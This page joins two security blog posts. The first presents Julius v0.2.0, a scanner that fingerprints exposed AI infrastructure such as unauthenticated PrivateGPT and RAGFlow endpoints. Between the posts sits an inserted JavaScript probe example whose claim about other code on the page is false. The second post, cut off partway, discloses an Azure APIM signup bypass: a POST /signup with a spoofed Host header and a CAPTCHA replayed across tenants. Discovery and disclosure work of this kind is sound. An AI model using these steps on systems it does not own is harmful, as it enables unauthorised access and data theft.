<p><strong>TL;DR</strong>: Julius v0.2.0 nearly doubles LLM fingerprinting probe coverage from 33 to 63, adding detection for cloud-managed AI services (AWS Bedrock, Azure OpenAI, Vertex AI), high-performance inference servers (SGLang, TensorRT-LLM, Triton), AI gateways (Portkey, Helicone, Bifrost), and self-hosted RAG platforms (PrivateGPT, RAGFlow, Quivr). This release also hardens the scanner itself with response size limiting and TLS configuration for enterprise environments. Update Julius and scan your network — you almost certainly have AI infrastructure you don’t know about.</p><p>When we shipped the <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">v0.1.1 update</a> back in February, Julius could detect 33 LLM services. That covered the self-hosted basics (Ollama, vLLM, llama.cpp) and a growing list of orchestration tools. But the gap was obvious: we had almost no coverage for cloud-managed AI services, production inference servers, or the AI gateway layer that sits between applications and models.</p><p>That gap is now closed. Julius v0.2.0 ships with <strong>63 probes</strong>, adding 30 new detections in a single release. More importantly, the <em>types</em> of infrastructure we now detect reflect where enterprise AI deployments are actually heading: cloud-managed endpoints, high-throughput inference engines, and the growing ecosystem of proxies and gateways that route traffic between them.</p><h2 class="wp-block-heading" id="5f5e1acf-3d93-47fd-b85c-eca8d7c590f6">What’s new in v0.2.0</h2><h3 class="wp-block-heading" id="0d06d4c8-d49f-4f1e-99f8-4e494e38d0be">Cloud-managed AI services (10 probes)</h3><p>This is the biggest category and the one we’ve been asked about most. Organizations deploying AI through their cloud provider often assume these endpoints are inherently private. 
They’re not — misconfigured API gateways, exposed proxy layers, and overly permissive network policies can put them on the open internet.</p><ul class="wp-block-list"> <li><strong>AWS Bedrock</strong> — Control plane and runtime detection via <code>/foundation-models</code> and <code>/model/{modelId}/converse</code></li> <li><strong>Azure OpenAI</strong> — Azure-specific OpenAI endpoint detection</li> <li><strong>Google Vertex AI</strong> — Vertex AI prediction and model endpoint detection</li> <li><strong>Databricks Model Serving</strong> — Model serving endpoint detection</li> <li><strong>Fireworks AI, Groq, Modal, Replicate, Together AI</strong> — Managed inference API detection</li> </ul><h3 class="wp-block-heading" id="1e08944b-ff5d-407a-a638-d8bbf1d3f0c7">Self-hosted inference servers (10 probes)</h3><p>These are the workhorses of production AI: high-performance inference engines that teams deploy for throughput, latency, or cost reasons. They tend to run with default configurations and minimal authentication.</p><ul class="wp-block-list"> <li><strong>SGLang</strong> — Detected via its unique <code>/server_info</code> endpoint exposing <code>mem_fraction_static</code> and <code>disaggregation_mode</code> fields</li> <li><strong>TensorRT-LLM</strong> — NVIDIA’s optimized inference runtime</li> <li><strong>Triton Inference Server</strong> — NVIDIA’s multi-framework serving platform</li> <li><strong>BentoML</strong> — ML model serving framework</li> <li><strong>Baseten Truss, DeepSpeed-MII, MLC LLM, Petals, PowerInfer, Ray Serve</strong> — Various self-hosted inference engines</li> </ul><h3 class="wp-block-heading" id="dc3a5015-fc0c-45e0-b1eb-a72a832d78a3">AI gateways and proxies (5 probes)</h3><p>The gateway layer is where organizations route, observe, and control traffic between their applications and LLM providers. 
An exposed gateway often means access to every model and API key behind it.</p><ul class="wp-block-list"> <li><strong>Portkey AI Gateway</strong> — AI gateway with provider routing and observability</li> <li><strong>Helicone</strong> — LLM observability and proxy platform</li> <li><strong>Bifrost</strong> — Multi-provider AI gateway</li> <li><strong>OmniRoute</strong> — LLM routing gateway</li> <li><strong>TensorZero</strong> — Model gateway with experimentation support</li> </ul><h3 class="wp-block-heading" id="c0a494f8-d8c6-4bcb-87eb-ce4389178f85">RAG and orchestration platforms (5 probes)</h3><p>Self-hosted RAG platforms are where things get particularly sensitive. These systems are purpose-built to ingest and query internal documents — contracts, HR policies, financial data, source code. An exposed RAG endpoint is, by definition, an exposed document store.</p><ul class="wp-block-list"> <li><strong>PrivateGPT</strong> — Private document Q&amp;A (detected via its <code>/v1/ingest/list</code> endpoint, which returns data even with zero ingested documents and auth disabled by default)</li> <li><strong>RAGFlow</strong> — Open-source RAG engine with deep document understanding</li> <li><strong>Quivr</strong> — Second brain RAG platform</li> <li><strong>h2oGPT</strong> — <a href="http://h2o.ai/" rel="noreferrer noopener">H2O.ai</a>‘s document Q&amp;A platform</li> <li><strong>Langflow</strong> — Visual LLM orchestration framework</li> </ul><h2 class="wp-block-heading" id="ccf95297-a0b7-4298-841e-a7c3e37f9f63">Why self-hosted RAG is the new shadow IT</h2><p>The OpenClaw story from our <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">last update</a> highlighted what happens when AI agent platforms get exposed: leaked API keys, filesystem access, and user impersonation. With this release, we’re seeing the same pattern play out with RAG platforms — except the stakes are different. 
Instead of agent credentials, you’re looking at the documents themselves.</p><p><strong>PrivateGPT</strong> is a good example. The entire value proposition is <em>“keep your documents private by running everything locally.”</em> The irony is that PrivateGPT’s API defaults to no authentication. Its <code>/v1/ingest/list</code> endpoint is a simple GET that returns every ingested document’s metadata, including filenames and chunk counts. The model field is hardcoded to <code>"private-gpt"</code>, which makes detection trivial and false positives near-zero.</p><p><strong>RAGFlow</strong> follows a similar pattern. Its <code>/v1/system/healthz</code> endpoint is unauthenticated and returns a JSON health check with a <code>doc_engine</code> field that’s unique to RAGFlow — it tracks the status of the Elasticsearch or Infinity backend that powers document retrieval. Even when RAGFlow is partially broken (HTTP 500), the health endpoint still responds with the same structure, making detection reliable in any state.</p><p>The problem isn’t that these tools are insecure by design. It’s that they’re easy to deploy, they serve an obvious need (“let me ask questions about our internal docs”), and teams spin them up without involving security. By the time anyone notices, the system has been indexing sensitive documents on an endpoint with no auth, no network restriction, and no monitoring.</p><p>This is shadow IT for the AI era, and it’s why discovery tooling matters.</p><h2 class="wp-block-heading" id="62d0339a-a8f9-4083-9311-4c150542b427">What else changed</h2><p>Beyond new probes, v0.2.0 includes changes to the scanner itself:</p><p><strong>Breaking API change:</strong> <code>scanner.NewScanner()</code> now requires two additional parameters — <code>maxResponseSize</code> and <code>tlsConfig</code>. 
If you’re using Julius as a library, see the <a href="https://github.com/praetorian-inc/julius/blob/main/CHANGELOG.md" rel="noreferrer noopener">migration guide</a> in the changelog.</p><p><strong>New CLI flags:</strong></p><ul class="wp-block-list"> <li><code>--max-response-size</code> — Limits response body size (default 10MB) to prevent memory exhaustion from large or malicious responses</li> <li><code>--insecure</code> — Skips TLS certificate verification for testing environments</li> <li><code>--ca-cert</code> — Specifies a custom CA certificate file for enterprise PKI environments</li> </ul><p><strong>Probe quality fixes:</strong></p><ul class="wp-block-list"> <li>Fixed the Ollama probe firing false positives on Ollama-compatible servers (SGLang, KoboldCpp) by requiring the <code>"families"</code> field in <code>/api/tags</code> responses</li> <li>Fixed <code>header.contains</code> rules that silently failed on HTTP/2 connections — this affected 5 cloud probes (AWS Bedrock, Cloudflare AI Gateway, Fireworks AI, Modal, OmniRoute)</li> <li>Removed overly generic detection blocks from Bifrost, DeepSpeed-MII, and Groq that caused cross-probe false positives</li> </ul><h2 class="wp-block-heading" id="4b0dd329-72a4-4875-af8c-d9619364d123">What this means for your assessments</h2><p>If you’re running Julius as part of your attack surface discovery workflow, update to v0.2.0:</p><pre id="510d68e8-6a8b-44a6-b4dd-9cfae893a6da" class="wp-block-code"><code>$ go install github.com/praetorian-inc/julius/cmd/julius@latest
$ julius probe &lt;target&gt;</code></pre><p>For enterprise environments with internal CAs:</p><pre id="4b986ae4-b239-4383-b14b-f92350b7e985" class="wp-block-code"><code>$ julius probe --ca-cert /path/to/ca.pem &lt;target&gt;</code></pre><p>All 63 probes are embedded in the binary. 
No external config, no probe downloads, no API keys.</p><p>The coverage now spans the full AI infrastructure stack: from cloud-managed inference (Bedrock, Azure OpenAI, Vertex AI) through self-hosted serving (SGLang, TensorRT-LLM, Triton) to the RAG and orchestration layer (PrivateGPT, RAGFlow, Langflow). If an organization is running AI infrastructure, Julius should find it.</p><p>We’re continuing to expand probe coverage as new tools emerge. If there’s a service you’re seeing in the wild that Julius doesn’t cover, <a href="https://github.com/praetorian-inc/julius/issues" rel="noreferrer noopener">open an issue</a> or submit a PR. Probes are simple YAML files — you can test locally with <code>julius validate ./probes</code> before submitting.</p><h2 class="wp-block-heading" id="1d4b8084-738e-4bd1-9649-abc7d548738e">FAQ</h2><p><strong>What’s the difference between Julius and model fingerprinting tools?</strong> Model fingerprinting identifies which LLM generated a piece of text. Julius identifies the <em>server infrastructure</em>: what software is running on the endpoint. Think of it as service detection for AI, similar to what Nmap does for traditional services.</p><p><strong>Does Julius send anything malicious?</strong> No. Julius sends standard HTTP requests (GET/POST to known paths) and analyzes the responses. It doesn’t exploit vulnerabilities, submit prompts, or modify anything on the target. It’s passive fingerprinting.</p><p><strong>How do probes get validated before release?</strong> Every probe is tested against live instances of the target service and cross-tested against other LLM services to confirm zero false positives. This release also fixed several cross-probe false positives from v0.1.x.</p><p><strong>Can I add detection for a service Julius doesn’t support yet?</strong> Yes. Probes are defined in simple YAML files. 
The <a href="https://github.com/praetorian-inc/julius/blob/main/CONTRIBUTING.md" rel="noreferrer noopener">contributing guide</a> walks through the format, and you can test locally with <code>julius validate ./probes</code> before submitting a PR.</p><p><strong>Why is there a breaking API change?</strong> The <code>NewScanner()</code> signature now requires <code>maxResponseSize</code> and <code>tlsConfig</code> parameters. This was necessary to add response size limiting (preventing OOM from malicious servers) and TLS configuration for enterprise environments. If you’re only using the CLI, nothing changes.</p><p>The post <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a 
href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Michelle Rhodes">Michelle Rhodes</a>. Read the original post at: <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/</a> </p>
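<p>The Julius post above explains two of its probe rules in enough detail to reproduce them: PrivateGPT's <code>/v1/ingest/list</code> answers with a model field hardcoded to <code>"private-gpt"</code>, RAGFlow's <code>/v1/system/healthz</code> carries a <code>doc_engine</code> field even when the service returns HTTP 500, and the Ollama probe had to start requiring <code>"families"</code> in <code>/api/tags</code> to stop matching Ollama-compatible servers. The post also mentions the new response size cap. The following is an added example, not Julius code and not its probe YAML: a small inventory classifier for hosts you own, written in JavaScript to match the rest of this page's code, run over constructed sample responses. The field names come from the post; the sample bodies are made up and the probe ordering and bounded-parse design are assumptions.</p>

```javascript
// Added example (not Julius code): minimal fingerprint rules from the post,
// applied to constructed responses, plus a response size cap before parsing.

const MAX_RESPONSE_BYTES = 10 * 1024 * 1024; // the post's 10MB default

// Refuse to parse anything over the cap so a hostile endpoint cannot feed the
// scanner an unbounded body and exhaust its memory.
function parseBounded(body, maxBytes = MAX_RESPONSE_BYTES) {
  if (Buffer.byteLength(body, 'utf8') > maxBytes) {
    return { error: 'response exceeds size limit' };
  }
  try {
    return { json: JSON.parse(body) };
  } catch (e) {
    return { error: 'not JSON' };
  }
}

// True if `key` appears anywhere in a nested JSON value.
function hasKeyDeep(value, key) {
  if (Array.isArray(value)) return value.some((v) => hasKeyDeep(v, key));
  if (value && typeof value === 'object') {
    return Object.keys(value).some((k) => k === key || hasKeyDeep(value[k], key));
  }
  return false;
}

// Most specific rules first so a generic-looking endpoint cannot shadow them.
// HTTP status is deliberately ignored: the post notes RAGFlow's health check
// keeps its shape even when the service is returning 500.
const PROBES = [
  {
    name: 'PrivateGPT',
    path: '/v1/ingest/list',
    // The model field is hardcoded to "private-gpt", which is decisive on its own.
    match: (j) => j.model === 'private-gpt',
  },
  {
    name: 'RAGFlow',
    path: '/v1/system/healthz',
    match: (j) => hasKeyDeep(j, 'doc_engine'),
  },
  {
    name: 'Ollama',
    path: '/api/tags',
    // A "models" list alone also matches Ollama-compatible servers; requiring
    // "families" is the v0.2.0 false-positive fix described in the post.
    match: (j) => Array.isArray(j.models) && hasKeyDeep(j, 'families'),
  },
];

// responses: { path: { status, body } } collected from one host.
function fingerprint(responses, maxBytes = MAX_RESPONSE_BYTES) {
  for (const probe of PROBES) {
    const r = responses[probe.path];
    if (!r) continue;
    const parsed = parseBounded(r.body, maxBytes);
    if (parsed.error) continue;
    if (probe.match(parsed.json)) return probe.name;
  }
  return 'unknown';
}

// Constructed sample hosts (not captures from real services).
const SAMPLE_HOSTS = {
  privategpt: {
    '/v1/ingest/list': { status: 200, body: '{"object":"list","model":"private-gpt","data":[]}' },
  },
  ragflow_broken: {
    '/v1/system/healthz': { status: 500, body: '{"status":"red","doc_engine":{"status":"red","type":"elasticsearch"}}' },
  },
  ollama: {
    '/api/tags': { status: 200, body: '{"models":[{"name":"llama3:latest","details":{"families":["llama"]}}]}' },
  },
  ollama_compatible: {
    '/api/tags': { status: 200, body: '{"models":[{"name":"some-model"}]}' },
  },
  padded: {
    '/v1/ingest/list': { status: 200, body: '{"model":"private-gpt","pad":"' + 'A'.repeat(64) + '"}' },
  },
};
```

<p>In a real inventory run the responses come from GET requests to the listed paths on hosts in your own ranges; the two points worth keeping from the post are the ordering of specific rules before generic ones and the cap applied before any parsing happens.</p>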

Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet

  • Published date: 2026-03-24 00:00:00


<div data-elementor-type="wp-post" data-elementor-id="10966" class="elementor elementor-10966" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-93afc5a e-con-full e-flex e-con e-parent" data-id="93afc5a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-86067b8 elementor-widget elementor-widget-text-editor" data-id="86067b8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The Azure APIM signup bypass is a critical vulnerability affecting 97.9% of internet-facing Developer Portals. Azure API Management (APIM) exposes APIs to external consumers through a Developer Portal, the interface where developers self-register, obtain API keys, and make API calls. The default APIM configuration ships with Basic Authentication enabled as the identity provider and the Starter product set to auto-approve subscriptions. When an administrator disables developer self-signup, they reasonably expect that endpoint to no longer be reachable.</p> <p>It doesn’t. An anonymous attacker can create an account, subscribe to API products, obtain valid API keys, and access backend services, all without authentication or relationship to the target organization. The “disable signup” toggle in Azure APIM’s Developer Portal is purely cosmetic. The backend REST API continues to accept registrations from anyone. This is an <strong>unauthenticated, internet-facing vulnerability</strong> in a service that is internet-facing by design.</p> <p>Praetorian noted that the original issue was detected by security researcher Mihalis Haatainen at <a href="https://www.bountyy.fi/">Bountyy Oy</a> in September 2025 (see <a href="https://github.com/bountyyfi/Azure-APIM-Cross-Tenant-Signup-Bypass/security/advisories/GHSA-vcwf-73jp-r7mv">GHSA-vcwf-73jp-r7mv</a>). 
Mihalis Haatainen reported the issue to Microsoft’s Security Response Center (MSRC). After two submissions and additional technical details, MSRC issued its final determination: <strong>“By design.”</strong></p> <p>Four months later, we assessed the real-world prevalence.</p> <p>We built a full reproduction environment, demonstrated the complete attack chain from anonymous internet access to sensitive API data exfiltration, and conducted a wide-scale analysis across the internet-facing APIM landscape. We found over 25,000 Azure APIM Developer Portals exposed to the internet. Based on our heuristic analysis, we estimated that 97.9% of them still accept signup requests. Only 51 instances out of 25,379 have actually removed the vulnerable Basic Authentication provider. The attack requires a web browser and a curl command; no credentials, no prior access, and no Azure subscription in the target tenant.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8c71d64 e-con-full e-flex e-con e-parent" data-id="8c71d64" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d027db elementor-widget elementor-widget-heading" data-id="4d027db" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Vulnerability</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9040393 e-con-full e-flex e-con e-parent" data-id="9040393" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-568bfd5 elementor-widget elementor-widget-text-editor" data-id="568bfd5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <a id="the-three-part-flaw"></a> </div> </div> <div data-particle_enable="false" 
data-particle-mobile-disabled="false" class="elementor-element elementor-element-a4066f6 e-con-full e-flex e-con e-parent" data-id="a4066f6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae49ae8 elementor-widget elementor-widget-heading" data-id="ae49ae8" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Three-Part Flaw</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e6910fb e-con-full e-flex e-con e-parent" data-id="e6910fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0a00cc7 elementor-widget elementor-widget-text-editor" data-id="0a00cc7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The fundamental issue is a disconnect between what administrators see in the Azure Portal and what actually happens on the backend. Three separate design decisions combine to create the vulnerability:</p> <p><strong>1. The UI toggle is cosmetic.</strong> When an administrator sets <code>portalsettings/signup.properties.enabled</code> to <code>false</code>, the developer portal reads this flag and hides the signup form. The underlying REST API endpoint at <code>/signup</code> remains active and continues to accept registration requests regardless of what the UI displays.</p> <p><strong>2. No tenant validation on the signup endpoint.</strong> Azure APIM Developer Portals are multi-tenant. The APIM infrastructure uses the <code>Host</code> header in incoming requests to route them to the correct instance. When an attacker sends a <code>POST /signup</code> request with <code>Host: victim-portal.developer.azure-api.net</code>, the infrastructure routes it to the victim’s instance. 
There is no validation that the request originated from that tenant’s portal, that the sender has any relationship to the target organization, or that the request was initiated from the target’s domain.</p> <p><strong>3. The CAPTCHA service is shared across all tenants.</strong> The signup flow includes a CAPTCHA challenge. However, the CAPTCHA validation service is global to Azure APIM. A challenge generated on Instance A is accepted as valid when submitted to Instance B.</p> <p><a id="X7b726d72045493ee04b98d787fee093aed871b0"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30e11bf e-con-full e-flex e-con e-parent" data-id="30e11bf" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5691fb elementor-widget elementor-widget-heading" data-id="a5691fb" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Kill Chain: From Anonymous Access to API Keys</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8130df1 e-con-full e-flex e-con e-parent" data-id="8130df1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-15a59e6 elementor-widget elementor-widget-text-editor" data-id="15a59e6" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Account creation is the entry point. The actual severity depends on what APIs are exposed through the Developer Portal and whether the attacker can obtain subscription keys to call them. 
We reproduced the full attack chain on controlled infrastructure to map each step.</p> <p><a id="why-account-creation-alone-is-not-enough"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aab12e7 e-con-full e-flex e-con e-parent" data-id="aab12e7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9bf00e2 elementor-widget elementor-widget-heading" data-id="9bf00e2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Why Account Creation Alone Is Not Enough</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4ebf48b e-con-full e-flex e-con e-parent" data-id="4ebf48b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-6f62cfc elementor-widget elementor-widget-text-editor" data-id="6f62cfc" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>An APIM Developer Portal account gives the attacker a session. What they can do with that session depends on the <strong>product configuration</strong>, a second layer of APIM settings that determines post-authentication access.</p> <p>APIs in APIM are not exposed directly. They are grouped into <strong>Products</strong>, and users must subscribe to a product to obtain a subscription key. Two product-level settings, <code>subscriptionRequired</code> and <code>approvalRequired</code>, determine whether an attacker can self-serve to obtain API access. The critical combination is <code>subscriptionRequired: true</code> with <code>approvalRequired: false</code> (subscription needed, but auto-approved). This is the <strong>default configuration</strong> for the built-in Starter product that ships with every new APIM instance. 
An attacker who creates an account can immediately subscribe and receive a valid API key without administrator involvement.</p> <p><a id="attack-path-overview"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6868fdd e-con-full e-flex e-con e-parent" data-id="6868fdd" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-63f1ca5 elementor-widget elementor-widget-heading" data-id="63f1ca5" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Attack Path Overview</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7dcc48d e-con-full e-flex e-con e-parent" data-id="7dcc48d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-d2a4dec elementor-widget elementor-widget-text-editor" data-id="d2a4dec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-00bfab0 e-con-full e-flex e-con e-parent" data-id="00bfab0" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3298fe1 elementor-widget elementor-widget-image" data-id="3298fe1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img fetchpriority="high" decoding="async" width="544" height="1308" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp" class="attachment-full size-full wp-image-10950" alt="Flowchart showing attack steps from anonymous attacker discovering target via Shodan to creating developer account and 
exfiltrating data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp 544w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-125x300.webp 125w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-426x1024.webp 426w" sizes="(max-width: 544px) 100vw, 544px"><figcaption class="widget-image-caption wp-caption-text">Attack path from anonymous attacker to data exfiltration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9af606b e-con-full e-flex e-con e-parent" data-id="9af606b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d2d10a elementor-widget elementor-widget-heading" data-id="4d2d10a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Simulated Attack Chain</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-589ceef e-con-full e-flex e-con e-parent" data-id="589ceef" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-741602a elementor-widget elementor-widget-text-editor" data-id="741602a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We demonstrated this against a controlled APIM instance under our ownership, configured with a mock healthcare IoT API behind the default Starter product. 
The CAPTCHA challenge was generated and solved on a separate APIM instance we also control, so the replay in Step 3 is genuinely cross-tenant.</p> <p><a id="step-1-identify-the-target."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ae38fb7 e-con-full e-flex e-con e-parent" data-id="ae38fb7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9ae8846 elementor-widget elementor-widget-heading" data-id="9ae8846" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 1: Identify the target.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79225a3 e-con-full e-flex e-con e-parent" data-id="79225a3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-65104af elementor-widget elementor-widget-text-editor" data-id="65104af" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker discovers the target’s Developer Portal hostname. 
These are publicly indexed; our Shodan enumeration found 25,379 unique instances.</p> <p>Target: apim-research-target-t3.developer.azure-api.net</p> <p><a id="X6b2794b1dd9fa9a2772ac2a5ffcb82f2e4e1b0f"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cacc5de e-con-full e-flex e-con e-parent" data-id="cacc5de" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ee4847b elementor-widget elementor-widget-heading" data-id="ee4847b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 2: Verify the target appears locked down, then bypass it.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-26e0b9e e-con-full e-flex e-con e-parent" data-id="26e0b9e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1c4f22c elementor-widget elementor-widget-text-editor" data-id="1c4f22c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The target organization’s portal shows no signup option, and the administrator has “disabled” signup. 
The only visible option is “Sign in”:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-25c2f34 e-con-full e-flex e-con e-parent" data-id="25c2f34" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-88b03ef elementor-widget elementor-widget-image" data-id="88b03ef" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="1720" height="1328" src="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp" class="attachment-full size-full wp-image-10951" alt="API portal webpage with header navigation showing Home, APIs, Products links and Sign In button, main content area displays 'page content' text" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp 1720w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-300x232.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1024x791.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-768x593.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1536x1186.webp 1536w" sizes="(max-width: 1720px) 100vw, 1720px"><figcaption class="widget-image-caption wp-caption-text">The target’s Developer Portal. The administrator has disabled signup. 
No “Sign up” button is visible anywhere on the page.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-2c45dd5 e-con-full e-flex e-con e-parent" data-id="2c45dd5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9500280 elementor-widget elementor-widget-text-editor" data-id="9500280" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, a single request confirms whether the signup endpoint is still active behind the scenes:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0f2b990 e-con-full e-flex e-con e-parent" data-id="0f2b990" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b2756da elementor-widget elementor-widget-image" data-id="b2756da" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="960" height="424" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp" class="attachment-full size-full wp-image-10952" alt="Terminal showing curl POST request to signup API returning HTTP 400 error with ValidationError for challenge and signupData fields" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-300x133.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-768x339.webp 768w" sizes="(max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-deaa032 e-con-full e-flex e-con e-parent" data-id="deaa032" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ea5391 elementor-widget elementor-widget-text-editor" data-id="4ea5391" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The HTTP 400 ValidationError with challenge and signupData fields confirms the /signup endpoint is live and Basic Auth is enabled. 
